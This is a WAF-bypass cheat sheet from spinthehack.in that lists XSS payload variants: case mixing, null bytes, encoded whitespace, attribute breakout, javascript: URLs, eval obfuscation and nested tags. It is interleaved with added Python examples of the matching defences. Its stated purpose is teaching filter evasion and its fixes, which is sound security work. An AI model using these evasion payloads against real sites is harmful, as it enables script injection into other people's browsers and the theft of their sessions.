WAF Bypass

XSS WAF Bypass Trick
www.spinthehack.in

▪ Basic Modification

<script>alert(1)</script>

This is our normal payload, but if the WAF is blocking the <script>, alert, and </script> tokens, then you can try the variants below.

<script >alert(1)</script>
<script >alert(1)</script>
Try giving random whitespace to bypass the WAF.

<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>
Try giving random HTML-encoded values between the script tags.

<ScRipT>alert(1)</sCriPt>
Try mixing lowercase and uppercase letters in between.

<%00script>alert(1)</script>
<script>al%00ert(1)</script>
Try adding %00 to bypass a restriction on the alert word.
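Every variant above defeats a rule that matches the literal strings <script> and alert( on the raw request. The Python below is an added example (not from the spinthehack slides) showing the defensive counterpart: canonicalize the input first (URL-decode, HTML-entity-decode, drop null bytes, collapse whitespace and control characters, lowercase) and only then apply the rule. The sample inputs are the variants listed above, embedded as constructed data; the function and pattern names are my own.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample inputs: the variants listed in this section.
SAMPLES = [
    "<script>alert(1)</script>",
    "<script >alert(1)</script>",
    "<script&#9>alert(1)</script>",
    "<script&#10>alert(1)</script>",
    "<script&#13>alert(1)</script>",
    "<ScRipT>alert(1)</sCriPt>",
    "<%00script>alert(1)</script>",
    "<script>al%00ert(1)</script>",
]

# A literal-string rule: both tokens must appear exactly as written.
NAIVE_RULE = re.compile(r"<script>.*alert\(", re.DOTALL)

# The same rule applied after canonicalization; it no longer needs the
# closing '>' right after 'script' because whitespace has been removed.
CANON_RULE = re.compile(r"<script.*alert\(", re.DOTALL)


def naive_match(payload: str) -> bool:
    """Match on the raw request string, as a signature-only filter does."""
    return NAIVE_RULE.search(payload) is not None


def canonicalize(payload: str) -> str:
    """Undo the encodings the bypass variants rely on.

    Deliberately lossy (all whitespace is removed): this form is for
    signature matching only, never for producing output.
    """
    s = unquote(payload)                    # %00 -> NUL, %3C -> '<', ...
    s = html.unescape(s)                    # &#9 / &#10 / &#13 -> control chars
    s = s.replace("\x00", "")               # null bytes never belong in markup
    s = re.sub(r"[\s\x00-\x1f]+", "", s)    # collapse whitespace/control chars
    return s.lower()                        # tag names are case-insensitive


def detect(payload: str) -> bool:
    """Canonicalize first, then match."""
    return CANON_RULE.search(canonicalize(payload)) is not None


if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{p!r:40} naive={naive_match(p)!s:5} canonical={detect(p)}")
```

Only the first sample trips the naive rule; all eight trip the canonicalized one. The lesson for the defender is that matching must happen on the decoded form the browser will actually see, and that canonicalization has to cover every decoding layer (URL, entity, null byte, case) the page lists.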

▪ Attributes and Tags

<input type ="text" name="input" value="hello">

You can try the following payloads to fool the website: because they contain "> (a closing sequence), the value attribute gets terminated early, and the website behaves as if the value were empty.

<input type="text" name="input" value="><script>alert(1)</script>
Try writing XSS test code in the value.

<randomtag type="text" name="input" value="><script>alert(1)</script>
Try writing any random tag at the start.

<iNpUt type="text" name="input" value="><script>alert(1)</script>
Trying to change lowercase and uppercase can also work.

<input/'type="text" name="input" value="><script>alert(1)</script>
Try replacing the space, or writing any HTML values between tags.

▪ Attributes and Tags

<input/type="text" name="input" value="><script>alert(1)</script>
<input&#9type="text" name="input" value="><script>alert(1)</script>
<input&#10type="text" name="input" value="><script>alert(1)</script>
<input&#13type="text" name="input" value="><script>alert(1)</script>
Try replacing the space or writing any HTML values between tags.

<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>
<input t%00ype="text" name="input" value="><script>alert(1)</script>
Try inserting a null byte (%00) at different positions.

<input type="text" name="input" value="><script>a%00lert(1)</script>
Null bytes can work in attribute names and values too.
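All of the attribute payloads on these two slides depend on the application writing user input straight into a quoted attribute. The Python below is an added example (not code from the slides) that puts the vulnerable pattern next to its hardened form and parses both outputs with the standard-library HTML parser to show what a browser would see. The breakout values are the ones listed above, embedded as constructed inputs; the function and class names are my own.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs: attribute-breakout values from this section.
BREAKOUT_VALUES = [
    '"><script>alert(1)</script>',
    '"><ScRipT>alert(1)</sCriPt>',
]


def render_unsafe(value: str) -> str:
    # Vulnerable pattern: user input interpolated straight into an attribute.
    return f'<input type="text" name="input" value="{value}">'


def render_safe(value: str) -> str:
    # Hardened: attribute-encode first. '"', '<', '>' and '&' become
    # entities, so the value can neither close the attribute nor open a tag.
    return f'<input type="text" name="input" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records start tags and the value attribute of the first <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.input_value: str | None = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and self.input_value is None:
            self.input_value = dict(attrs).get("value")


def parse(markup: str):
    """Return (start tags in document order, value the browser gives the input)."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.input_value


if __name__ == "__main__":
    for v in BREAKOUT_VALUES:
        print("unsafe:", parse(render_unsafe(v)))
        print("safe:  ", parse(render_safe(v)))
```

With the unsafe renderer the parser reports a second start tag, script, regardless of letter case; with the safe renderer it reports a single input tag whose value attribute round-trips to exactly the string the user submitted. Output encoding in the right context is what removes the need for the WAF to recognise every case and null-byte variation.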

▪ Event Handlers

<input >

A button which a user is going to click on a page. By working on some JavaScript we can create a button (an event).

Try these alternatives instead of onsubmit (if it doesn't work):
<object
<body
<body >
<script
<input autofocus ></a >

These alternatives can also be used if the HTML used here is HTML5:
<audio src="new.mp3" >
<video src="new.mp4"
<svg width="200" height="100" >

▪ Delimiters & Brackets

A delimiter is one or more characters used to separate text.

<img
<img
Try using single and double quotes.

<img
<img
>
Try using encoded values to bypass.

<img
Try using a backtick or accent.

<img
>
Can use encoded values in between.

<img src=`x`
Try using ` (grave accent).

▪ Delimiters & Brackets

Same as delimiters, brackets can also help to bypass website or page filters.

<<script>alert(1)//<</script>
By using extra brackets the system can be tricked, and by using a double slash the extra bracket on the closing tag is commented out.

<input
An open bracket at the end could also help to bypass.

«input >
Try using different brackets.

&#174input
Try using different characters.

▪ Pseudo Protocols

<a href="https://www.google.com">Click Here</a>
It's a hyperlink where a user goes from one page to another with just one click.

<a href="javascript:alert(1)">Click Here</a>
Try injecting code using the javascript: pseudo-protocol to check for XSS.

Other attributes that take a URL as a value can also be used:
<img src=javascript:alert(1)>
<form action=javascript:alert(1)>
<object data=javascript:alert(1)>
<button formaction=javascript:alert(1)>
<video src=javascript:alert(1)>
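The defence that covers every URL-valued attribute at once is a scheme allowlist applied before the value is written into href, src, action, data or formaction. The Python below is an added example (not from the slides) of such a check; it strips control characters and whitespace before parsing, approximating the browser's own URL normalization so that a scheme split by a tab is still recognised. The sample URLs are constructed (the Google link from the slide plus the javascript: values above), and ALLOWED_SCHEMES is an assumed application policy.

```python
import re
from urllib.parse import urlsplit

# Assumed policy: schemes this application is willing to emit into a URL attribute.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Constructed sample inputs mapped to the expected verdict.
SAMPLE_URLS = {
    "https://www.google.com": True,
    "/account/settings": True,
    "javascript:alert(1)": False,
    "JavaScript:alert(1)": False,
    "java\tscript:alert(1)": False,
    "  javascript:alert(1)": False,
}


def is_safe_url(value: str) -> bool:
    """Scheme allowlist for any attribute that takes a URL.

    Control characters and spaces are removed before parsing, approximating
    how browsers normalize a URL before resolving its scheme, so that
    "java\\tscript:" is judged as "javascript:".
    """
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme == "":
        # Relative or protocol-relative URL: resolves to the page's own
        # scheme, so it cannot become a javascript: URL.
        return True
    return scheme in ALLOWED_SCHEMES


def safe_href(value: str, fallback: str = "#") -> str:
    """Return the value if it passes the allowlist, otherwise an inert fallback."""
    return value if is_safe_url(value) else fallback


if __name__ == "__main__":
    for url, expected in SAMPLE_URLS.items():
        print(f"{url!r:28} safe={is_safe_url(url)} (expected {expected})")
```

An allowlist is preferable to a blocklist of "javascript" spellings because the attacker controls the spelling and the defender controls the list of schemes the site actually needs.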

▪ Existing JavaScript & Character Escaping

<script>var a = 'myteststring; ... </script>
Try defining a variable and injecting a payload.

'; alert(1); //
The script will still function, but the system won't filter it because of the double slash.

<script>var a = '\\'; alert(1); //
Escaping characters can also be helpful.

<script>a\u006cert(1)</script>
Using Unicode characters like this can help.

▪ Dynamic String Construction & Eval()

JavaScript contains a function called eval().

eval('1 + 1')
This function evaluates to 2.

<script>eval('a\u006cert(1)')</script>
We can use Unicode encoding inside eval('...').

<script>eval('al' + 'ert(1)')</script>
If the function name is blocked, then building it from string pieces can work.

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
There is another function that can be used alongside eval(), called String.fromCharCode().

▪ Meta Refresh & File Renaming

The web browser can automatically refresh the current page after a certain period.

<meta http-equiv="refresh" content="0;url=javascript:alert(1);">

<script src="payload.jpg">
Try renaming the source to an image file.

▪ Sanitization & Length Limits

<script><script>alert(1)</script>
Try adding multiple tags (sometimes the application removes only the first instance of the script tag).

<sc<script>ript>alert(1)</script>
You can add any tag as the first instance to get it filtered out by the application.
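Both payloads above exploit sanitizers that are not idempotent: one removes only the first tag, the other removes every tag but only once, so the removal itself reassembles a working <script>. The Python below is an added example (not from the slides) placing those two weak sanitizers beside a version that re-runs the removal until the output stops changing and refuses input that never converges. The two payloads are embedded as constructed inputs; function names are my own.

```python
import re

# Matches an opening or closing <script ...> tag, any letter case.
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)

# Constructed sample inputs: the two payloads from this section.
DUPLICATED = "<script><script>alert(1)</script>"
NESTED = "<sc<script>ript>alert(1)</script>"


def strip_first(markup: str) -> str:
    """Weak sanitizer 1: removes only the first script tag it finds."""
    return SCRIPT_TAG.sub("", markup, count=1)


def strip_all_once(markup: str) -> str:
    """Weak sanitizer 2: removes every script tag, but in a single pass."""
    return SCRIPT_TAG.sub("", markup)


def strip_until_stable(markup: str, max_rounds: int = 10) -> str:
    """Re-run the removal until the output stops changing (a fixpoint).

    Input that has not converged after max_rounds is rejected outright
    rather than returned half-cleaned.
    """
    for _ in range(max_rounds):
        cleaned = SCRIPT_TAG.sub("", markup)
        if cleaned == markup:
            return cleaned
        markup = cleaned
    raise ValueError("markup did not converge; refusing to accept it")


def still_has_script_tag(markup: str) -> bool:
    """True if a script tag survives sanitization."""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    print("strip_first     :", strip_first(DUPLICATED))
    print("strip_all_once  :", strip_all_once(NESTED))
    print("until_stable    :", strip_until_stable(NESTED))
```

The fixpoint loop closes these two specific gaps, but strip-and-continue remains a blocklist; the reliable fix is to encode untrusted data for the context it is written into, which makes the first-instance trick and the nesting trick irrelevant.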

If a page is being returned because of the length limit, then:

<input type="hidden" name="id" value=""><script>/*">
<input type="hidden" name="checksum" value="*/alert(1)/*">
<input type="hidden" name="status" value="*/</script>"

Everything between /* and */ gets ignored, so the browser ultimately processes our payload as if it had been injected in only one location.

▪ Advanced Filter Evasion Techniques

<script>alert(1)</script>

Imagine that in this payload you are not allowed to use </script>, which is the closing tag. What will you do now?

Don't worry, we have a solution for you: the official OWASP website has a list of many more tricks to bypass WAFs.

Visit this link:

XSS Filter Evasion Cheat Sheet | OWASP